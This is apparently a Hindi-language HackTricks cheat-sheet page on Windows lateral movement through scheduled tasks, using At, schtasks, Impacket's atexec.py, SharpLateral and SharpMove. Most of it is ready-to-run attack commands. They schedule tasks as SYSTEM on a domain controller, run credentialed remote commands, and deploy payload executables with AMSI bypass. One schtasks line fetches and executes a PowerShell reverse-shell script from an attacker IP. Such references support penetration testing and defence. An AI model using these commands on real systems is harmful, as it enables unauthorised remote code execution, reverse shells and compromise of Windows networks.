AtExec / SchtasksExec
Reading time: 3 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
यह कैसे काम करता है
At आपको उन होस्ट में कार्य शेड्यूल करने की अनुमति देता है जहाँ आप उपयोगकर्ता नाम/(पासवर्ड/हैश) जानते हैं। इसलिए, आप इसका उपयोग अन्य होस्ट में कमांड निष्पादित करने और आउटपुट प्राप्त करने के लिए कर सकते हैं।
At \\victim 11:00:00PM shutdown -r
schtasks का उपयोग करते हुए, आपको पहले कार्य बनाना होगा और फिर उसे कॉल करना होगा:
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local
आप Impacket's atexec.py
का उपयोग करके AT कमांड का उपयोग करके दूरस्थ सिस्टम पर कमांड निष्पादित कर सकते हैं। इसके लिए लक्षित सिस्टम के लिए मान्य क्रेडेंशियल्स (उपयोगकर्ता नाम और पासवर्ड या हैश) की आवश्यकता होती है।
atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami
आप SharpLateral का भी उपयोग कर सकते हैं:
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName
आप SharpMove का उपयोग कर सकते हैं:
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
सिल्वर टिकट के साथ schtasks के उपयोग के बारे में अधिक जानकारी यहाँ.
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।